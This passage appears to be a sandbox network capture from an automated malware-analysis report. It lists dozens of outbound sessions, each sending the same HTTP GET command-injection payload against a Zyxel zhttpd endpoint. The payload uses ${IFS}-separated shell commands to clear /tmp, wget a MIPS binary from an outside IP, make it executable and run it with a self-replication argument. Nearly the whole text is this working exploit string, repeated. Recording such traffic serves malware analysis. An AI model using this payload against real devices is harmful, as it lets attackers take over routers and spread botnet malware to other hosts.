                                                Jan 12, 2024 18:16:09.126895905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                991192.168.2.2356440208.38.178.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.126924992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                992192.168.2.2349516122.181.70.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.126981974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                993192.168.2.235449038.70.14.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.127023935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                994192.168.2.2341510163.242.99.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.127048016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                995192.168.2.233516483.113.60.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.127104998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                996192.168.2.2336942167.173.83.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.127146959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                997192.168.2.233838027.140.98.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.127182961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                998192.168.2.235178234.233.162.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.127213955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                999192.168.2.2351118171.189.0.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.127244949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1000192.168.2.234223891.247.252.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.127291918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1001192.168.2.2345550108.187.186.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.127315998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1002192.168.2.2334450165.76.51.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.127341032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1003192.168.2.2338156163.222.6.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.127383947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1004192.168.2.2352992139.127.122.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.127463102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1005192.168.2.233443218.106.242.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.127465963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1006192.168.2.2352388118.26.189.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.127466917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1007192.168.2.2360420133.229.34.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.127484083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1008192.168.2.233392431.17.106.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.127513885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1009192.168.2.235977090.28.81.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.127571106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1010192.168.2.233355493.16.241.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.127602100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1011192.168.2.234759890.47.199.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.127619982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1012192.168.2.234517685.239.206.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.127682924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1013192.168.2.233353472.8.121.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.127721071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1014192.168.2.2333190136.171.9.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.127737045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1015192.168.2.23585204.110.168.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.127788067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1016192.168.2.2338906154.239.15.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.127827883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1017192.168.2.233337073.145.59.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.127852917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1018192.168.2.234165414.245.160.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.127886057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1019192.168.2.234472088.246.77.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.127939939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1020192.168.2.2349486122.147.128.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.127948999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1021192.168.2.2348178202.27.40.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.127986908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1022192.168.2.233928296.139.122.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.128031969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1023192.168.2.234587298.165.77.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.128062963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1024192.168.2.2351954178.31.83.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.128109932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1025192.168.2.2352218114.137.1.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.128181934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1026192.168.2.2336706172.231.250.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.128187895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1027192.168.2.2354280212.210.106.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.128210068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1028192.168.2.23426565.111.240.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.128264904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1029192.168.2.2337334123.25.226.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.128302097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1030192.168.2.233958825.178.254.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.128324032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1031192.168.2.233696220.174.138.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.128376007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1032192.168.2.2338714195.84.206.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.128386021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1033192.168.2.2343020166.139.116.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.128433943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1034192.168.2.234830286.182.94.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.128459930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1035192.168.2.2342090165.206.134.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.128504992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1036192.168.2.23448365.212.170.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.128540993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1037192.168.2.235835090.243.212.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.128576994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1038192.168.2.2335398145.138.74.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.128606081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1039192.168.2.235179685.100.186.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.128650904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1040192.168.2.2333800122.218.195.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.128684998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1041192.168.2.2335562173.64.122.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.128711939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1042192.168.2.2334348206.240.90.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.128737926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1043192.168.2.235346018.124.186.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.128789902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1044192.168.2.2352776189.131.130.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.128844976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1045192.168.2.2338692217.176.38.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.128844976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1046192.168.2.2353278169.16.182.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.128923893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1047192.168.2.2345052216.58.141.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.128946066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1048192.168.2.2343666204.27.51.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.128971100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1049192.168.2.2343784145.39.17.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.129015923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1050192.168.2.234954858.5.213.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.129059076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1051192.168.2.2357694170.57.188.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.129120111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1052192.168.2.235631084.105.114.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:09.129127026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1053192.168.2.235409638.229.68.151443
                                                TimestampBytes transferredDirectionData
